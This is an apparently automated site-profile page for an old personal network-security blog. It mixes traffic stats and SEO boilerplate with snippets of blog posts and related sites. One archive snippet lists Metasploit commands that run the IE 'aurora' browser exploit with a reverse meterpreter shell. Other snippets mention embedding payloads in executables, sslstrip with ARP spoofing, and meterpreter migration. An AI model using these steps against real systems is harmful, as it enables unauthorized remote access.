netsecuritystuff.blogspot.com netsecuritystuff.blogspot.com

netsecuritystuff.blogspot.com

Charles Watathi ---- comps stuff, mostly

Charles Watathi - - comps stuff, mostly. Friday, May 27, 2011. The blog has moved to http:/ netsecuritystuff.wordpress.com/. Tuesday, February 15, 2011. I have written a simple seh tutorial on my wordpress blog,. Http:/ netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/. Facebook, so close yet so far. Have https, then have it optional, seriously? Wednesday, February 2, 2011. I had the priviledge of meeting Harald Welte. Tuesday, January 25, 2011. Installing virtualbox on backtrack 4 r2.

http://netsecuritystuff.blogspot.com/

WEBSITE DETAILS
SEO
PAGES
SIMILAR SITES

TRAFFIC RANK FOR NETSECURITYSTUFF.BLOGSPOT.COM

TODAY'S RATING

>1,000,000

TRAFFIC RANK - AVERAGE PER MONTH

BEST MONTH

July

AVERAGE PER DAY Of THE WEEK

HIGHEST TRAFFIC ON

Saturday

TRAFFIC BY CITY

CUSTOMER REVIEWS

Average Rating: 4.3 out of 5 with 3 reviews
5 star
1
4 star
2
3 star
0
2 star
0
1 star
0

Hey there! Start your review of netsecuritystuff.blogspot.com

AVERAGE USER RATING

Write a Review

WEBSITE PREVIEW

Desktop Preview Tablet Preview Mobile Preview

LOAD TIME

0.6 seconds

FAVICON PREVIEW

  • netsecuritystuff.blogspot.com

    16x16

  • netsecuritystuff.blogspot.com

    32x32

CONTACTS AT NETSECURITYSTUFF.BLOGSPOT.COM

Login

TO VIEW CONTACTS

Remove Contacts

FOR PRIVACY ISSUES

CONTENT

SCORE

6.2

PAGE TITLE
Charles Watathi ---- comps stuff, mostly | netsecuritystuff.blogspot.com Reviews
<META>
DESCRIPTION
Charles Watathi - - comps stuff, mostly. Friday, May 27, 2011. The blog has moved to http:/ netsecuritystuff.wordpress.com/. Tuesday, February 15, 2011. I have written a simple seh tutorial on my wordpress blog,. Http:/ netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/. Facebook, so close yet so far. Have https, then have it optional, seriously? Wednesday, February 2, 2011. I had the priviledge of meeting Harald Welte. Tuesday, January 25, 2011. Installing virtualbox on backtrack 4 r2.
<META>
KEYWORDS
1 blog has moved
2 posted by
3 charles watathi
4 no comments
5 another seh tutorial
6 kindly review it
7 gsm security
8 1 comment
9 facebook and https
10 sriking back
CONTENT
Page content here
KEYWORDS ON
PAGE
blog has moved,posted by,charles watathi,no comments,another seh tutorial,kindly review it,gsm security,1 comment,facebook and https,sriking back,usage,python spidertrap py,older posts,my blog list,jeremiah grossman,2 weeks ago,2 months ago,ethicalhackers
SERVER
GSE
CONTENT-TYPE
utf-8
GOOGLE PREVIEW

Charles Watathi ---- comps stuff, mostly | netsecuritystuff.blogspot.com Reviews

https://netsecuritystuff.blogspot.com

Charles Watathi - - comps stuff, mostly. Friday, May 27, 2011. The blog has moved to http:/ netsecuritystuff.wordpress.com/. Tuesday, February 15, 2011. I have written a simple seh tutorial on my wordpress blog,. Http:/ netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/. Facebook, so close yet so far. Have https, then have it optional, seriously? Wednesday, February 2, 2011. I had the priviledge of meeting Harald Welte. Tuesday, January 25, 2011. Installing virtualbox on backtrack 4 r2.

INTERNAL PAGES

netsecuritystuff.blogspot.com netsecuritystuff.blogspot.com
1

Charles Watathi ---- comps stuff, mostly: March 2010

http://netsecuritystuff.blogspot.com/2010_03_01_archive.html

Charles Watathi - - comps stuff, mostly. Thursday, March 25, 2010. Msfencode a Msfpayload Into An Existing Executable. Totally awesome, and the executable still works and you get your shell :). Http:/ carnal0wnage.blogspot.com/2010/03/msfencode-msfpayload-into-existing.html. Wednesday, March 24, 2010. Busting shells with the Digininja. Subscribe to: Posts (Atom). Exporting workspaces from your MSF database. US-bound: An open letter to Offensive Security. Creating Real Looking User Accounts in AD Lab.

2

Charles Watathi ---- comps stuff, mostly: January 2010

http://netsecuritystuff.blogspot.com/2010_01_01_archive.html

Charles Watathi - - comps stuff, mostly. Sunday, January 17, 2010. By now, u know about Google being hacked by china. The exploit used has been ported to metasploit. It works also on XP SP2. Msf use exploit/windows/browser/ie aurora. Msf exploit(ie aurora) set SRVHOST 192.168.25.1. Msf exploit(ie aurora) set URIPATH /. Msf exploit(ie aurora) set PAYLOAD windows/meterpreter/reverse tcp. Msf exploit(ie aurora) set LHOST 192.168.25.1. Msf exploit(ie aurora) exploit -j. Msf exploit(ie aurora) exploit -j.

3

Charles Watathi ---- comps stuff, mostly: Another SEH tutorial

http://netsecuritystuff.blogspot.com/2011/02/another-seh-tutorial.html

Charles Watathi - - comps stuff, mostly. Tuesday, February 15, 2011. I have written a simple seh tutorial on my wordpress blog,. Http:/ netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/. Subscribe to: Post Comments (Atom). Exporting workspaces from your MSF database. US-bound: An open letter to Offensive Security. Creating Real Looking User Accounts in AD Lab. I'm joining the fight against malware and ransomware with SentinelOne. A Decade of Exploit Database Data. View my complete profile.

4

Charles Watathi ---- comps stuff, mostly: October 2009

http://netsecuritystuff.blogspot.com/2009_10_01_archive.html

Charles Watathi - - comps stuff, mostly. Friday, October 30, 2009. Today i was just idle, reading stuff from sans.org reading room, then i started idle browsing. Landed these two links that made my day. Http:/ www.darknet.org.uk/category/retards/. If you know of any other, please share. Subscribe to: Posts (Atom). Exporting workspaces from your MSF database. US-bound: An open letter to Offensive Security. Creating Real Looking User Accounts in AD Lab. A Decade of Exploit Database Data.

5

Charles Watathi ---- comps stuff, mostly: Facebook and HTTPS

http://netsecuritystuff.blogspot.com/2011/01/facebook-and-https.html

Charles Watathi - - comps stuff, mostly. Monday, January 24, 2011. Roughly two weeks I came across an article at /dev/random that there was a malicious java script injected on facebook in a Tunisia ISP that was capturing users user names and passwords http:/ blog.rootshell.be/2011/01/13/tunisia-tracks-users-with-javascript-injection/. The register also confirmed this http:/ www.theregister.co.uk/2011/01/25/tunisia facebook password slurping/. But even with https, be careful, awesome tools such as ssl-str...

UPGRADE TO PREMIUM TO VIEW 13 MORE

TOTAL PAGES IN THIS WEBSITE

18

LINKS TO THIS WEBSITE

infoseckenya.blogspot.com infoseckenya.blogspot.com

Infosec Kenya: February 2015

http://infoseckenya.blogspot.com/2015_02_01_archive.html

My take on security, tutorials and research. Monday, February 9, 2015. Subscribe to: Posts (Atom). AUTO - MIGRATE A METERPRETER SESSION. The process used to gain access to a remote system may not always be stable and may crash locking you out of the system. You could always mi. REVERSE ENGINEERING ANDROID APPS. Having covered the security implications of being able to access data directory of android apps as root and what you information you can get. ANDROID HEAP DUMPS – A SECURITY PERSPECTIVE. One of th...

infoseckenya.blogspot.com infoseckenya.blogspot.com

Infosec Kenya: HUAWEI IDEOS (Android OS)

http://infoseckenya.blogspot.com/2011/03/huawei-ideos-android-os.html

My take on security, tutorials and research. Wednesday, March 30, 2011. HUAWEI IDEOS (Android OS). I have been playing around with the Huawei IDEOS android phone, more so in terms of infosec and just like Charles let the pictures do the talking for this Nokia N90 series here. I will also do the same. Overlook fing network scan results. Overlook fing service scan on a particular host on a network. Overlookfing service scan results. Am waiting for an android metasploit. May 15, 2011 at 9:59 PM. The process...

infoseckenya.blogspot.com infoseckenya.blogspot.com

Infosec Kenya: ANDROID HEAP DUMPS – A SECURITY PERSPECTIVE

http://infoseckenya.blogspot.com/2011/05/heap-dumps-security-perspective.html

My take on security, tutorials and research. Tuesday, May 17, 2011. ANDROID HEAP DUMPS – A SECURITY PERSPECTIVE. This blog is kind of a flip of that, can a security researcher find any use for heap dumps? To answer this question, I set out to find out how to generate heap dumps on android and analyze them to find out what interesting information I could find. To generate a dump file on android, you have to be SU i.e. the device has to be rooted. Type the following command on the SU command line:. C: cd p...

infoseckenya.blogspot.com infoseckenya.blogspot.com

Infosec Kenya: SSLSTRIP

http://infoseckenya.blogspot.com/2011/03/sslstrip.html

My take on security, tutorials and research. Tuesday, March 1, 2011. One of the cool attacks that completely evades ssl is sslstrip. Conjured up by a hacker named moxie (http:/ www.thoughtcrime.org/software/sslstrip/) this attack can be used to capture passwords once the perimeter network defenses have been punched through. Linux backtrack distro currently v.4 r.2 (). Ip address of the target. Default router of the target. Which by default in sslstrip.py is 10000. Start arp spoofing using the command.

infoseckenya.blogspot.com infoseckenya.blogspot.com

Infosec Kenya: ANDROID DEVICES VULNERABILITY.

http://infoseckenya.blogspot.com/2011/03/android-devices-vulnerability.html

My take on security, tutorials and research. Monday, March 14, 2011. Thomas cannon discovered a vulnerability in Android devices operating system http:/ thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/. This vulnerability allows an attacker to obtain the contents of a file when a user browses to a web server that has been compromised. He passed on this info as any responsible hacker should and Google who have promised to fix this hole in the upcoming Android 2.3. From the metasploit team.

infoseckenya.blogspot.com infoseckenya.blogspot.com

Infosec Kenya: KIST TECT TALK

http://infoseckenya.blogspot.com/2015/02/kist-tect-talk.html

My take on security, tutorials and research. Monday, February 9, 2015. Subscribe to: Post Comments (Atom). AUTO - MIGRATE A METERPRETER SESSION. The process used to gain access to a remote system may not always be stable and may crash locking you out of the system. You could always mi. REVERSE ENGINEERING ANDROID APPS. Having covered the security implications of being able to access data directory of android apps as root and what you information you can get. PASS THE HASH ATTACK. HUAWEI IDEOS (Android OS).

infoseckenya.blogspot.com infoseckenya.blogspot.com

Infosec Kenya: May 2013

http://infoseckenya.blogspot.com/2013_05_01_archive.html

My take on security, tutorials and research. Wednesday, May 8, 2013. Trip down memory lane). While looking around for qemu images, I came across one for the linux kernel 0.11 and simply had to try it. Http:/ oldlinux.org/Linux.old/qemu-images/Linux-0.00-041217.vfd.gz. To run the qemu image run. Qemu -L pc-bios -hda linux-0.11-devel-060625.qcow2 (Ctrl Alt f) takes you into full screen. Subscribe to: Posts (Atom). AUTO - MIGRATE A METERPRETER SESSION. REVERSE ENGINEERING ANDROID APPS. PASS THE HASH ATTACK.

infoseckenya.blogspot.com infoseckenya.blogspot.com

Infosec Kenya: AUTO - MIGRATE A METERPRETER SESSION

http://infoseckenya.blogspot.com/2011/03/auto-migrate-meterpreter-session.html

My take on security, tutorials and research. Wednesday, March 9, 2011. AUTO - MIGRATE A METERPRETER SESSION. The process used to gain access to a remote system may not always be stable and may crash locking you out of the system. You could always migrate to a new process using the migrate script, but the sometimes you may not be fast enough to migrate manually. In comes the autorun script which allows you to specify a more stable process to migrate to once the system has been exploited. My wireshark adve...

infoseckenya.blogspot.com infoseckenya.blogspot.com

Infosec Kenya: September 2013

http://infoseckenya.blogspot.com/2013_09_01_archive.html

My take on security, tutorials and research. Friday, September 13, 2013. Standard Chartered KE Document in/Security :-). My first challenge was how to generate the 60,466,176 numbers, turns out kali linux. Comes with a tool that met my requirement named crunch. Is a word-list generator based on the password format used whether alphabets,numeric or a combination of the two. Is one of the tools in the operating systems arsenal. Subscribe to: Posts (Atom). AUTO - MIGRATE A METERPRETER SESSION. A heap dump i...

UPGRADE TO PREMIUM TO VIEW 33 MORE

TOTAL LINKS TO THIS WEBSITE

42

OTHER SITES

netsecuritypros.com netsecuritypros.com

Network Security Pros

If you have a government security clearance and feel you would add value to our team, we welcome you to explore opportunities with Network Security Pros. Network Security Pros LLC. Is an independent security firm providing security management, technical security, and forensic security consulting services. Our staff of Certified Security Consultants provide a full range of risk management services, including:. Threat and vulnerability assessments. Disaster recovery, emergency planning, and training.

netsecurityroom.biz netsecurityroom.biz

インターネットセキュリティー対策お助けルーム

これらのウィルスがもし自分で使っているパソコンやスマートフォン 詳しくは、 総務省のHP スマートフォンの特性.

netsecuritysbs.com netsecuritysbs.com

My Site

This is my site description. A website created by GoDaddy’s Website Builder.

netsecurityservices.com netsecurityservices.com

Price Request - BuyDomains

Url=' escape(document.location.href) , 'Chat367233609785093432', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=640,height=500');return false;". Need a price instantly? Just give us a call. Toll Free in the U.S. We can give you the price over the phone, help you with the purchase process, and answer any questions. Get a price in less than 24 hours. Fill out the form below. One of our domain experts will have a price to you within 24 business hours. United States of America.

netsecuritysolutions.com netsecuritysolutions.com

netsecuritysolutions.com

Inquire about this domain.

netsecuritystuff.blogspot.com netsecuritystuff.blogspot.com

Charles Watathi ---- comps stuff, mostly

Charles Watathi - - comps stuff, mostly. Friday, May 27, 2011. The blog has moved to http:/ netsecuritystuff.wordpress.com/. Tuesday, February 15, 2011. I have written a simple seh tutorial on my wordpress blog,. Http:/ netsecuritystuff.wordpress.com/2011/02/15/another-seh-tutorial/. Facebook, so close yet so far. Have https, then have it optional, seriously? Wednesday, February 2, 2011. I had the priviledge of meeting Harald Welte. Tuesday, January 25, 2011. Installing virtualbox on backtrack 4 r2.

netsecuritystuff.wordpress.com netsecuritystuff.wordpress.com

netsecuritystuff | comp stuff, mostly – Charles Watathi

Comp stuff, mostly – Charles Watathi. Pentesting on the Samsung Galaxy? July 9, 2013. Are all those pentest tools running on android? Just went to http:/ neopwn.com. And it seems some interesting stuff is cooking there. Cant wait for August the 1st 🙂. Installing Virtualbox on Kali Linux. July 5, 2013. I have been receiving lots of comments that the below guide is not working the latest Kali 2017. I suggest you do the following:. Ascertain you have the following line in your /etc/sources.list file. Root@...

netsecuritysuite.com netsecuritysuite.com

netsecuritysuite.com

The Sponsored Listings displayed above are served automatically by a third party. Neither the service provider nor the domain owner maintain any relationship with the advertisers. In case of trademark issues please contact the domain owner directly (contact information can be found in whois).

netsecuritysvcs.com netsecuritysvcs.com

Network Security Services

Darr; Skip to Main Content. ALERT LOGIC NETWORK SCANNING AND MONITORING. NSS IT/EDP SECURITY AUDIT. Ransomware / Malware Remediation. SECURE NETWORK DESIGN AND CONSULTING. Providing network and computer security services. Contact Us to Get Started. NSS provides managed security services including. Alert Logic Network Scanning and Monitoring. Secure Email fro HIPAA, GLBAm and other regulation compliance. Wireless Audit / Security. Secure Network Design and Consulting. Network Security Services, Inc.

netsecuritysys.com netsecuritysys.com

Replacing an internal door

Replacing an internal door. Tips on Caring for Your Garage Door. 4 Things to Look For When Choosing a Security Screen Door. Affordable Bathroom Updates When Selling a Home. How to Choose the Right Wood Heater for Your Home. Why Have Roller Shutters Installed Outside Your Homes Windows? Replacing an internal door. Tips on Caring for Your Garage Door. 4 Things to Look For When Choosing a Security Screen Door. Affordable Bathroom Updates When Selling a Home. How to Choose the Right Wood Heater for Your Home.

netsecuritytaisaku-atoz.org netsecuritytaisaku-atoz.org

インターネットセキュリティー対策まるわかりAtoZ

インターネットの世界においては、ウイルス感染や個人情報漏えい 詳しくは、 独立行政法人情報処理推進機構の発表する資料 情報漏えい発生時の対応ポイント集.